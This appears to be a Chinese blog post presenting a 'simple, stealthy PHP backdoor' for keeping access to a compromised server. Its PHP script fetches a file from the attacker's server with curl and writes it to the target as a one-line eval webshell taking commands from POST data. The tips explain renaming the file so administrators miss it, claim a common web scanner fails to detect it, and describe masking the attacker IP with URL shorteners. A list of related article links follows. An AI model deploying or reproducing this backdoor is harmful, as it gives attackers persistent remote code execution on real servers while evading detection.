簡單又較隱蔽的PHP後門
簡單又較隱蔽的PHP後門
話不多說,直接上程式碼(backdoor.php)
<?php
function adminer($url, $isi) {
$fp = fopen($isi, "w");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FILE, $fp);
return curl_exec($ch);
curl_close($ch);
fclose($fp);
ob_flush();
flush();
}
if(adminer("http://xx.xx.xx.xx/config.txt","shell.php")) {
echo "success, access shell.php";
} else {
echo "fail";
}
?>
Tips1:xx.xx.xx.xx是你的VPS伺服器,config.txt要放在你的伺服器上,並且能訪問。config.txt的內容為一句話,如下:
<?php eval(@$_POST['cmd']);?>
接著訪問backdoor.php檔案即可在目標伺服器上生成一句話後門
Tips2:在實戰中記得把檔名修改一下,否則很容易被管理員發現。
這種許可權維持的方法相對於直接留下一句話檔案要更加穩定,即使管理員將一句話後門檔案刪除了,只要backdoor.php檔案還在,就可以一直生成後門檔案。而且D盾還檢測不出backdoor.php檔案。如果手上沒有免殺PHP後門的朋友們,不妨可以退而求其次,嘗試一下。
Tips3:backdoor.php檔案中會出現你的VPS伺服器IP地址,這在一定程度上會有被反制的風險。那我們可以將URL轉換成短連結進行隱匿。
短連結線上轉換網址:ReURL - 傳送門
短連結還原網址:https://www.donglishuzhai.net/tools/hy.php
經過測試,ReURL生成的短連結,上面的還原網站也還原不出來。
相關文章
- 幾個簡單又實用的PHP函式PHP函式
- Linux終端注意了!隱蔽性更強的後門木馬Rmgr來了Linux
- 隱蔽的秩序-讀書筆記筆記
- 一次隱藏較隱蔽的SQL最佳化問題----不要輕易的忽視count(列)SQL
- Ajax+PHP簡單入門教程PHP
- 簡單又好用的高效工具
- PHP後門新玩法:一款猥瑣的PHP後門分析PHP
- java中又實用又基本又容易錯的比較Java
- 一次慢查詢暴露的隱蔽問題
- 快速定位隱蔽的sql效能問題及調優SQL
- mongodb和hbase的簡單比較MongoDB
- PHP socket 的簡單理解PHP
- php簡單常用的APIPHPAPI
- 字串-簡單字串比較字串
- 【技術向】利用ShadowMove巧妙的隱蔽連線
- 「補課」進行時:設計模式(16)——簡單又實用的門面模式設計模式
- ICMP隱蔽隧道攻擊分析與檢測(二)
- ICMP隱蔽隧道攻擊分析與檢測(三)
- ICMP隱蔽隧道攻擊分析與檢測(四)
- Billy Belceb病毒編寫教程(DOS篇)---隱蔽(Stealth)
- php實現簡單的SQLBuilderPHPSQLUI
- 學習內網安全--隱蔽隧道通訊技術內網
- java入門最後一章 簡易撲克牌比較大小Java
- PHP PDO 簡單教程PHP
- php面試簡單整理PHP面試
- PHP--簡單DemoPHP
- Proxy:簡單小巧又強大好用的代理系統
- 簡單又好用的錄屏軟體——錄大咖
- Python中那些簡單又好用的特性和用法Python
- 前端動畫效果實現的簡單比較前端動畫
- Play框架與NodeJS的簡單比較框架NodeJS
- 比較簡單的win32 OpenGL 程式Win32
- 小白入門 - PHP簡介PHP
- EasyUI - 一個簡單的後臺管理系統入門例項UI
- 一個不易發現的PHP後門 --PHP
- laragon 簡單好用的 PHP 環境GoPHP
- 關於 PHP 框架的簡單思考PHP框架
- 簡單、新型的PHP ORM庫 - arrayDBPHPORM